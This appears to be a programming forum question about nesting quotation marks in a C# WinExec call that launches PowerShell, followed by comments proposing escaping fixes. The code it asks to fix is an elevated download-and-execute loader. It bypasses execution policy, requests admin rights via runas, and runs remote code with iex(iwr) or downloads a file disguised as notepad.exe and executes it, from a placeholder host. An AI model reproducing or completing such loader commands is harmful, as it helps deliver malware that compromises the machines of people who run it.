# What quotations to use in powershell called from C# when ", \" and ' are already in use

Tags: c#, windows, powershell, dll, quotes

I'm learning about quotations and there is a question I can't get solved. There is a line of code written in C# that use iwr

```
WinExec("powershell -noexit -ExecutionPolicy bypass -Command \"Start-Process -verb runas powershell\" \"'-noexit -ExecutionPolicy bypass -Command iex( iwr http://example.com/raw/xxxxxxx )\" '\"", 1);
```

Because the lack of the IE engine support I need to replace "iex( iwr http://example.com/raw/xxxxxxx )" with:

```
curl -o notepad.exe "http://example.com/?Id=1&data=more%0data"; .\notepad.exe
```

Usually I would do it like this:

```
-noexit -ExecutionPolicy bypass -Command "curl -o notepad.exe \"http://example.com/?Id=1&data=more%0data\"; .\notepad.exe"
```

But in the example which is given ", \" and ' are already in use. While in the command I think I need to add " and \".

Are there other quotations I can use to make this work? How to do this?

Comment: Why are you launching `powershell.exe` from a C# application? The entire API is written in .NET, you can host PowerShell directly in your app...

Comment: You have arguments.  Try : $parameters = "'http://example.com/?Id=1&data=more%0data'; .\notepad.exe"
$command = "& notepad.exe $parameters"
Invoke-Expression $command

Comment: @MathiasR.Jessen It is a question about quotations. It's not my code and it is not about logic/efficiency

Comment: @pwrsheller My bad, I read it as a question about safe and reliable marshalling of input from C# to PowerShell :)

Comment: Believe `curl` will still default to `iwr` unless specifying `.exe` but, you can use `\"\"\"http://example.com/?Id=1&data=more%0data\"\"\"`.

Comment: @AbrahamZinala like this?:
-noexit -ExecutionPolicy bypass -Command \"\"curl -o notepad.exe \"\"\"http://example.com/?Id=1&data=more%0data\"\"\"; .\notepad.exe\"\"

Comment: @AbrahamZinala I tried the what you said and get: The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : AmpersandNotAllowed

Comment: I would escape it